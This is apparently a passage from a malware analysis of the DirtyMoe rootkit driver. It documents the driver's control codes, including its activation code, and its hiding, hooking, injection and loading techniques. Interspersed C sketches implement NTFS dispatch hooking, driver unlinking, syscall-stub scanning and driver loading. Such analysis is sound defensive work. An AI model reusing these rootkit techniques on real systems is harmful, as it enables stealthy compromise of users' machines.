Another Driver Entry step sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors thread creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for process injection:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of the Start Routine loads the rest of the necessary entries from the registry. The complete list of registry entries is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives an IRP_MJ_DEVICE_CONTROL request with an I/O control code (IOCTL) when a user-mode thread calls the Win32 API DeviceIoControl(); see [1] for more information. The user-mode application sends the request directly to a specific device driver, and the driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from user-mode. The following Table 3 summarizes the controlling IOCTLs that can be sent by the malware using the Win32 API.

IOCTL      Description
0x222C80   The driver accepts other IOCTLs only after it has been activated. The malware in user-mode activates the driver by sending this IOCTL together with the authorization code 0xB6C7C230 (a user-mode sketch of this activation call follows the table).
0x2224C0   The malware sends data which the driver writes to the system registry. The key, value name, and data type are set by the Setting control codes. Used variables: regKey, regValue, regData, regType.
0x222960   This IOCTL clears all data stored by the driver. Used variables: see the Setting and Inserting variables.
0x2227EC   If the malware needs to hide a specific driver, the driver adds the given driver name to listBaseDllName and hides it using Driver Hiding.
0x2227E8   The driver adds the name of a registry key to the WinDeviceAddress list and hides this key using Registry Hiding. Used variable: WinDeviceAddress.
0x2227F0   The driver hides a given service defined by the name of its DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC   If the malware wants to deactivate Registry Hiding, the driver restores the original kernel GetCellRoutine().
0x222004   The malware sends the ID of a process that it wants to terminate. The driver calls the kernel function ZwTerminateProcess() and terminates the process and all of its threads regardless of the malware's privileges.
0x2224C8   The malware sends data which the driver writes to the file defined by the filePath variable; see the Setting control codes. Used variables: filePath, fileData.
Table 3. Controlling IOCTLs
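
As a rough user-mode sketch of the activation call from Table 3 (assuming the driver exposes a symbolic link and that the authorization code is passed as a single DWORD in the input buffer; the device name \\.\ExampleDevice is a placeholder, not the real link name):

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Placeholder symbolic link name; the real link created by the driver differs.
    HANDLE dev = CreateFileW(L"\\\\.\\ExampleDevice", GENERIC_READ | GENERIC_WRITE,
                             0, NULL, OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE) {
        printf("CreateFile failed: %lu\n", GetLastError());
        return 1;
    }

    DWORD authCode = 0xB6C7C230;   // authorization code expected by IOCTL 0x222C80
    DWORD bytes = 0;
    BOOL ok = DeviceIoControl(dev, 0x222C80, &authCode, sizeof(authCode),
                              NULL, 0, &bytes, NULL);
    printf("activation %s\n", ok ? "sent" : "failed");

    CloseHandle(dev);
    return 0;
}
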
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list                 Variable             Purpose
Registry HIVE                    WinDeviceAddress     Defines a list of registry entries that the malware wants to hide in the system.
Process image file name          WinDeviceMaker       Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, where it grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding of files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
                                 WinDeviceMakerB      Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, where it grants access to the NTFS file systems.
                                 WinDeviceMakerOnly   Specifies a blacklist of processes defined by process image file name. It is used in Callback of NTFS Driver, where it refuses access to the NTFS file systems.
File names (full path)           WinDeviceName,
                                 WinDeviceNameB       Determine a whitelist of files to which Callback of NTFS Driver should grant access. It is used in combination with WinDeviceMaker and WinDeviceMakerB: if a file is on the whitelist and the requesting process is also whitelisted, the driver grants access to the file.
                                 WinDeviceNameOnly    Defines a blacklist of files to which Callback of NTFS Driver should deny access. It is used in combination with WinDeviceMakerOnly: if a file is on the blacklist and the requesting process is also blacklisted, the driver refuses access to the file.
File names (containing a number) WinDeviceNumber      Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a naming convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}, i.e., a file name that includes a number.
Process ID                       ListProcessId1       Defines a list of processes requiring access to the NTFS file systems. The malware does not restrict access for these processes; see Callback of NTFS Driver.
                                 ListProcessId2       The same purpose as ListProcessId1. Additionally, it is used as the whitelist for Registry Hiding, so the driver does not restrict registry access. The Minifilter Driver does not limit processes in this list either.
Driver names                     listBaseDllName      Defines a list of drivers that should be hidden in the system; see Driver Hiding.
Service names                    listServices         Specifies a list of services that should be hidden in the system; see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values as global variables. The following Table 5 summarizes and groups these variables and their purpose.

Function                     Variable                 Description
File Writing (Shutdown)      filename1_for_ShutDown,
                             data1_for_ShutDown       Define a file name and data for the first file written during the driver shutdown.
                             filename2_for_ShutDown,
                             data2_for_ShutDown       Define a file name and data for the second file written during the driver shutdown.
Registry Writing (Shutdown)  regKey1_shutdown,
                             regValue1_shutdown,
                             regData1_shutdown,
                             regType1                 Specify the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
                             regKey2_shutdown,
                             regValue2_shutdown,
                             regData2_shutdown,
                             regType2                 Specify the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing            filePath                 Determines the file name used to write data; see Controlling IOCTL 0x2224C8.
Registry Writing             regKey,
                             regValue,
                             regType                  Specify the registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.); see Controlling IOCTL 0x2224C0.
Unknown (unused)             dwWinDevicePathA,
                             dwWinDeviceDataA         Keep a path and data for file A.
                             dwWinDevicePathB,
                             dwWinDeviceDataB         Keep a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function           Variable                Description
Process to Inject  dwWinDriverMaker2,
                   dwWinDriverMaker2_2     Define two command-line arguments. If a process with one of these arguments is created, the driver injects the process.
                   dwWinDriverMaker1,
                   dwWinDriverMaker1_2     Define two process names that should be injected when such a process is created.
DLL to Inject      dwWinDriverPath1,
                   dwWinDriverDataA        Specify a file name and data for the injection into processes defined by dwWinDriverMaker2 or dwWinDriverMaker1.
                   dwWinDriverPath1_2,
                   dwWinDriverDataA_2      Define a file name and data for the injection into processes defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
                   dwWinDriverPath2,
                   dwWinDriverDataB        Keep a file name and data for the injection into processes defined by dwWinDriverMaker2 or dwWinDriverMaker1.
                   dwWinDriverPath2_2,
                   dwWinDriverDataB_2      Specify a file name and data for the injection into processes defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().
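
A minimal sketch of this registration pattern is shown below. It registers a post-operation callback for IRP_MJ_DIRECTORY_CONTROL and checks for IRP_MN_QUERY_DIRECTORY; the actual result-filtering logic of the DirtyMoe driver is not reproduced.

#include <fltKernel.h>

static PFLT_FILTER g_Filter = NULL;

static FLT_POSTOP_CALLBACK_STATUS
PostDirectoryControl(PFLT_CALLBACK_DATA Data, PCFLT_RELATED_OBJECTS FltObjects,
                     PVOID CompletionContext, FLT_POST_OPERATION_FLAGS Flags)
{
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    UNREFERENCED_PARAMETER(Flags);

    if (Data->Iopb->MinorFunction == IRP_MN_QUERY_DIRECTORY) {
        // A malicious filter would walk the returned directory-information
        // entries here and unlink the ones it wants to hide.
    }
    return FLT_POSTOP_FINISHED_PROCESSING;
}

static const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_DIRECTORY_CONTROL, 0, NULL, PostDirectoryControl },
    { IRP_MJ_OPERATION_END }
};

static const FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION), FLT_REGISTRATION_VERSION, 0,
    NULL, Callbacks, NULL /* no unload callback in this sketch */
};

NTSTATUS RegisterEnumerationFilter(PDRIVER_OBJECT DriverObject)
{
    NTSTATUS status = FltRegisterFilter(DriverObject, &FilterRegistration, &g_Filter);
    if (NT_SUCCESS(status)) {
        status = FltStartFiltering(g_Filter);
        if (!NT_SUCCESS(status)) {
            FltUnregisterFilter(g_Filter);
        }
    }
    return status;
}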

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if the requesting process is not present in the whitelists. There are two kinds of whitelists. The first ones (Process ID and File names) ensure that the QueryDirectory results are not modified if the process ID or the process image file name requesting the given I/O operation (QueryDirectory) is whitelisted; they represent malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber and defines a set of suffixes. FltPostOperation() iterates over each item of the QueryDirectory result; if an enumerated item name has a suffix defined in this whitelist, the driver removes the item from the QueryDirectory results. This ensures that the whitelisted files are not visible to non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file from user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from the malware file names, e.g., Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process IDs, and allowed files. If a process requesting disk access is whitelisted, then the requested file must also be on the whitelist; it is double protection. The blacklist is focused on process image names, so blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.
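
A hedged sketch of this callback swap is shown below. ObReferenceObjectByName() and IoDriverObjectType are exported by ntoskrnl.exe but not declared in the public WDK headers, so they are declared manually; the replacement dispatch routine simply forwards to the original one instead of implementing the access-control logic.

#include <ntddk.h>

// Exported by ntoskrnl.exe, declared manually (not in the public WDK headers).
extern POBJECT_TYPE *IoDriverObjectType;
NTSTATUS ObReferenceObjectByName(PUNICODE_STRING ObjectName, ULONG Attributes,
                                 PACCESS_STATE AccessState, ACCESS_MASK DesiredAccess,
                                 POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode,
                                 PVOID ParseContext, PVOID *Object);

static PDRIVER_DISPATCH g_OriginalNtfsCreate = NULL;

// Stand-in for what the post calls MalNtfsCreatCallback(); it only forwards here.
static NTSTATUS HookedNtfsCreate(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    // Real code would consult the white/black lists and either complete the IRP
    // with STATUS_ACCESS_DENIED or pass it through.
    return g_OriginalNtfsCreate(DeviceObject, Irp);
}

NTSTATUS HookNtfsCreate(VOID)
{
    UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\FileSystem\\Ntfs");
    PDRIVER_OBJECT ntfs = NULL;

    NTSTATUS status = ObReferenceObjectByName(&name, OBJ_CASE_INSENSITIVE, NULL, 0,
                                              *IoDriverObjectType, KernelMode, NULL,
                                              (PVOID *)&ntfs);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    // Atomically swap the IRP_MJ_CREATE dispatch pointer and keep the original.
    g_OriginalNtfsCreate = (PDRIVER_DISPATCH)InterlockedExchangePointer(
        (PVOID *)&ntfs->MajorFunction[IRP_MJ_CREATE], (PVOID)HookedNtfsCreate);

    ObDereferenceObject(ntfs);
    return STATUS_SUCCESS;
}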

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation of a registry key can be intercepted by hooking the kernel method GetCellRoutine(). The configuration manager assigns a control block (CM_KEY_CONTROL_BLOCK) to each open registry key and keeps all control blocks in a hash table to quickly search for existing ones. GetCellRoutine() computes the memory address of a requested key. Therefore, if the malware driver takes control over GetCellRoutine(), it can filter which registry keys are visible; more precisely, which keys are found in the hash table.

The malware driver finds the address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses a well-documented implementation [3, 4]: it walks the kernel structures obtained via the ZwOpenKey() kernel call, looks up the CM_KEY_CONTROL_BLOCK and its associated HHIVE structure corresponding to the requested key, and replaces the pointer to the GetCellRoutine() method stored in the HHIVE structure; see Figure 3.

Figure 3. Overwriting GetCellRoutine

The pitfall of this method is that the offsets of the looked-up structures, variables, and methods are specific to each Windows version or build. So, the driver must determine which Windows version it runs on.

The MalGetCellRoutine() hook method performs 3 basic operations as follows:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across the whole HIVE of a requested key. If the driver finds a registry key that should be hidden, it returns the last registry key of the iterated HIVE instead. When the iteration reaches the end of the HIVE, the driver does not return the last key (since it was returned before) but returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, it returns the last key of the searched HIVE several times. So, the final result of the registry query can contain duplicate keys.
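
Purely as conceptual pseudocode of the principle above (the HHIVE/HCELL types and the helper checks are placeholders for undocumented internals, not real APIs):

#include <ntddk.h>

typedef ULONG HCELL_INDEX;           // index of a cell inside a registry hive
typedef struct _HHIVE *PHHIVE;       // opaque in this sketch
typedef PVOID (*PGET_CELL_ROUTINE)(PHHIVE Hive, HCELL_INDEX Cell);

static PGET_CELL_ROUTINE g_OriginalGetCellRoutine;   // saved before hooking

// Placeholder helpers: the rootkit implements these against undocumented structures
// (and also consults the whitelists described in this section).
BOOLEAN CellBelongsToHiddenKey(PHHIVE Hive, HCELL_INDEX Cell);
HCELL_INDEX LastCellOfHive(PHHIVE Hive);
BOOLEAN IsLastCellOfHive(PHHIVE Hive, HCELL_INDEX Cell);

PVOID MalGetCellRoutineSketch(PHHIVE Hive, HCELL_INDEX Cell)
{
    // 1. Call the original kernel GetCellRoutine().
    PVOID cellData = g_OriginalGetCellRoutine(Hive, Cell);

    // 2./3. During enumeration, answer a hidden key with the last key of the HIVE,
    //       and answer the (already returned) last key with NULL to end the search.
    if (CellBelongsToHiddenKey(Hive, Cell)) {
        return g_OriginalGetCellRoutine(Hive, LastCellOfHive(Hive));
    }
    if (IsLastCellOfHive(Hive, Cell)) {
        return NULL;
    }
    return cellData;
}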

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

The decision-making mechanism is more complicated on Windows 10. The driver hides the requested key only for the regedit.exe application, and only if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into newly created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Driver Entry initialization. The routine registers a callback which is subsequently notified when a thread is created or deleted. The callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and a Create flag. The driver affects only threads whose Create flag is set to TRUE, i.e., only newly created threads.
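
A minimal sketch of this registration is shown below, using the documented PCREATE_THREAD_NOTIFY_ROUTINE signature; only the Create-flag filtering is shown, not the injection logic.

#include <ntddk.h>

static VOID ThreadNotifyRoutine(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create)
{
    UNREFERENCED_PARAMETER(ThreadId);

    if (!Create) {
        return;  // only newly created threads are of interest
    }

    // Real code would compare the process image name / command-line checksum
    // against the four WinDriverMaker* globals and queue the APC-based injection.
    UNREFERENCED_PARAMETER(ProcessId);
}

NTSTATUS RegisterThreadNotification(VOID)
{
    return PsSetCreateThreadNotifyRoutine(ThreadNotifyRoutine);
}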

The whitelisting is focused on two aspects: the image name of the created thread's process and its command-line arguments. The image name is stored in WinDriverMaker1, and the arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by process name and two processes defined by command-line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

Successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly, to avoid detection techniques, and instead obfuscates how it obtains them. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll.

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of the injected thread, including program instructions.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all looked-up methods are located consecutively after the ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts inspecting the code segment from the address of ZwAllocateVirtualMemory() and looks for instructions that move a constant into eax (e.g., mov eax, ??h). These constants identify the VirtualMemory methods; see Table 7.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When the appropriate constant is found, the final address of a looked-up method is calculated as follows:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find the methods can be summarized as follows:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspicious in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods
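
As a rough user-mode illustration of the same lookup (scanning ntdll.dll rather than kernel memory; the 0xB8 opcode check, the 0x1000-byte scan window, and the alignment constant of 3 are assumptions for illustration, and the constant 0x50 comes from Table 7):

#include <windows.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

// Look for "mov eax, imm32" (opcode 0xB8) carrying the given constant and step
// back by alignment_constant to the assumed start of the stub.
static uint8_t *FindStubByConstant(uint8_t *start, size_t window,
                                   uint32_t constant, size_t alignment_constant)
{
    for (size_t i = alignment_constant; i + 5 <= window; i++) {
        if (start[i] == 0xB8 && memcmp(start + i + 1, &constant, 4) == 0) {
            return start + i - alignment_constant;
        }
    }
    return NULL;
}

int main(void)
{
    uint8_t *anchor = (uint8_t *)GetProcAddress(GetModuleHandleW(L"ntdll.dll"),
                                                "ZwAllocateVirtualMemory");
    if (anchor == NULL) {
        return 1;
    }

    uint8_t *candidate = FindStubByConstant(anchor, 0x1000, 0x50, 3);
    printf("candidate ZwProtectVirtualMemory stub: %p\n", (void *)candidate);
    return 0;
}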

The success of this obfuscation depends on correct identification of the Windows version. We found one Windows 7 version for which the lookup returns different methods than the malware wants, namely ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), and ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used to obtain the NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets a pointer to the kernel structure PEB_LDR_DATA, which contains the PE headers and imports of the modules loaded in that process. If the import table includes a required method, the driver extracts its address, which is the entry point of the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread's APC queue and is called periodically. APC (Asynchronous Procedure Call) is a technique for queueing a job to be done in the context of a specific thread. The driver rewrites the instructions of NtTestAlert() so that execution jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step of the process injection is to find free memory for a code cave. The driver finds free memory near the NtTestAlert() routine address. The code cave includes a shellcode, as Figure 6 demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (the code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends with a return instruction, so the original NtTestAlert() is then invoked. Finally, rdx contains the jump address where the driver injected the malicious code. The next item of the code cave is the path to the DLL file which shall be loaded into the injected process. The remaining items of the code cave are the original address and the original code instructions of NtTestAlert().
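
A hedged sketch of a possible code-cave layout matching this description (field order and sizes are illustrative only and were not recovered from the sample):

#include <stdint.h>

#pragma pack(push, 1)
typedef struct code_cave_layout {
    uint8_t  shellcode[64];          // stub: sets up rdx/rax, then jumps to the payload
    uint16_t dll_path[260];          // UTF-16 path of the DLL passed to LdrLoadDll()
    void    *original_nt_test_alert; // saved address of the original NtTestAlert()
    uint8_t  original_bytes[16];     // overwritten NtTestAlert() prologue bytes
} code_cave_layout;
#pragma pack(pop)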

The driver writes the malicious code to the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are overwritten with an instruction that simply jumps to the shellcode. As a result, when NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it restores the original instructions of the rewritten NtTestAlert() code. Secondly, it invokes the located LdrLoadDll() method and loads the appropriate DLL into the address space of the injected process. Finally, it executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is essentially identical to the x64 version. However, the x86 malicious code needs to find the 32-bit variant of the LdrLoadDll() method, using a technique similar to the one described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Service Control Manager (SCM) to manage system services. The executable of the SCM is services.exe. This program runs at system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all running services in an undocumented service record (SERVICE_RECORD) structure.

To hide a required service, the driver must patch the corresponding service record. Firstly, the driver finds the services.exe process and attaches to it via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. services.exe keeps all running services as a linked list of SERVICE_RECORD structures [5]. The malware driver iterates this list and unlinks the services defined by the listServices whitelist; see Table 4.

The byte sequence used for Windows 2000, XP, Vista, and Windows 7 is {45 3B E5 74 40 48 8D 0D}. There is another byte sequence, {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D}, that is never used because it is bound to a Windows version that the malware driver never identifies; it is perhaps still in development.
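
A minimal sketch of the signature scan itself (locating the byte sequence in a buffer that has already been copied from the services.exe address space; attaching to the process and walking the SERVICE_RECORD list are omitted):

#include <ntddk.h>

// Byte sequence used for Windows 2000/XP/Vista/7, taken from this section.
static const UCHAR g_ScmPattern[] = { 0x45, 0x3B, 0xE5, 0x74, 0x40, 0x48, 0x8D, 0x0D };

static PUCHAR FindPattern(PUCHAR buffer, SIZE_T length,
                          const UCHAR *pattern, SIZE_T patternLength)
{
    if (length < patternLength) {
        return NULL;
    }
    for (SIZE_T i = 0; i <= length - patternLength; i++) {
        if (RtlCompareMemory(buffer + i, pattern, patternLength) == patternLength) {
            return buffer + i;   // candidate location of the service-record code
        }
    }
    return NULL;
}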

The hidden services cannot be detected using the PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via the Windows Event Log. Therefore, we can enumerate all regular services and all logged services and then diff the two lists to find the hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver, based on an IOCTL from user-mode. The Driver Entry receives a parameter representing the driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called the driver section, which points to a LDR_DATA_TABLE_ENTRY kernel structure storing information about the loaded driver, such as the base/entry point address, image name, and image size. The entries form a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].
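
A hedged DKOM sketch of this unlinking is shown below; only the leading InLoadOrderLinks field of the (undocumented) kernel LDR_DATA_TABLE_ENTRY is assumed, which is enough to demonstrate the unlink.

#include <ntddk.h>

// Partial, assumed view of the driver-section structure.
typedef struct _KLDR_DATA_TABLE_ENTRY_PARTIAL {
    LIST_ENTRY InLoadOrderLinks;    // double-linked list of loaded modules
    // ... remaining (undocumented) fields omitted ...
} KLDR_DATA_TABLE_ENTRY_PARTIAL, *PKLDR_DATA_TABLE_ENTRY_PARTIAL;

VOID HideDriver(PDRIVER_OBJECT DriverObject)
{
    PKLDR_DATA_TABLE_ENTRY_PARTIAL entry =
        (PKLDR_DATA_TABLE_ENTRY_PARTIAL)DriverObject->DriverSection;

    if (entry != NULL) {
        // Unlink this module from the loaded-module list; APIs that walk the list
        // will no longer see it, while the driver itself keeps running.
        RemoveEntryList(&entry->InLoadOrderLinks);
        InitializeListHead(&entry->InLoadOrderLinks);
    }
}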

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. The driver image is not permanently stored on disk; the service always extracts, loads, and then deletes the driver image at service startup. A secondary aim of the service is to eliminate evidence of the driver loading and thereby complicate forensic analysis. The service strives to camouflage its registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record describing the malicious driver to load; see the following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, contrary to the common Windows naming convention. Moreover, an ImagePath prefixed with the dump_ string is normally used for virtual drivers (loaded only in memory) that manage the memory dump during a Windows crash. The malware abuses this virtual-driver naming convention to be less conspicuous. The principle of memory dumping using virtual drivers is described in [7, 8].

The ImagePath value is different after each Windows reboot, but it always abuses the name of a native system driver; see a few instances collected during Windows boots: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys.

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().
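
A hedged user-mode sketch of this loading step is shown below: NtLoadDriver() receives the registry path of the service entry from section 3.1. The prototype is resolved from ntdll.dll, the registry path reuses the example above, and creating the registry entry and enabling SeLoadDriverPrivilege beforehand are omitted.

#include <windows.h>
#include <winternl.h>
#include <wchar.h>
#include <stdio.h>

typedef NTSTATUS (NTAPI *PFN_NT_LOAD_DRIVER)(PUNICODE_STRING DriverServiceName);

int main(void)
{
    PFN_NT_LOAD_DRIVER pNtLoadDriver = (PFN_NT_LOAD_DRIVER)GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "NtLoadDriver");
    if (pNtLoadDriver == NULL) {
        return 1;
    }

    // Registry path of the driver service entry (example from section 3.1).
    static WCHAR path[] =
        L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\services\\dump_E3947328";

    UNICODE_STRING serviceName;
    serviceName.Buffer = path;
    serviceName.Length = (USHORT)(wcslen(path) * sizeof(WCHAR));
    serviceName.MaximumLength = (USHORT)(serviceName.Length + sizeof(WCHAR));

    NTSTATUS status = pNtLoadDriver(&serviceName);   // requires SeLoadDriverPrivilege
    printf("NtLoadDriver returned 0x%08lX\n", (unsigned long)status);
    return 0;
}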

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via API calls, so a forensic trace can still be found in the SYSTEM registry HIVE located in %SystemRoot%\system32\config\SYSTEM: the API call only removes the relevant HIVE pointer, but the unreferenced data is still present in the HIVE stored on disk. Hence, we can read the removed registry entries with RegistryExplorer.

The loaded driver also removes the dumped driver file (with the dump_ prefix). We were not able to restore this file with file-recovery tools, but it can be extracted directly from the service DLL file.

Capturing the driver image and registry keys

The malware service is responsible for loading the driver and cleaning up the loading evidence. We put a breakpoint on the nt!IopLoadDriver() kernel method, which is reached whenever a process wants to load a driver into the system. We waited for the wanted driver and then listed all system processes. The corresponding service (svchost.exe) had a call stack containing the kernel call for driver loading; we then killed the service by modifying the EIP register. The process (service) was killed, and the whole of Windows ended in a BSoD. Windows made a crash dump, so the file system caches were flushed and the malicious service did not finish its cleanup in time. Therefore, we were able to mount the volume and read all the wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

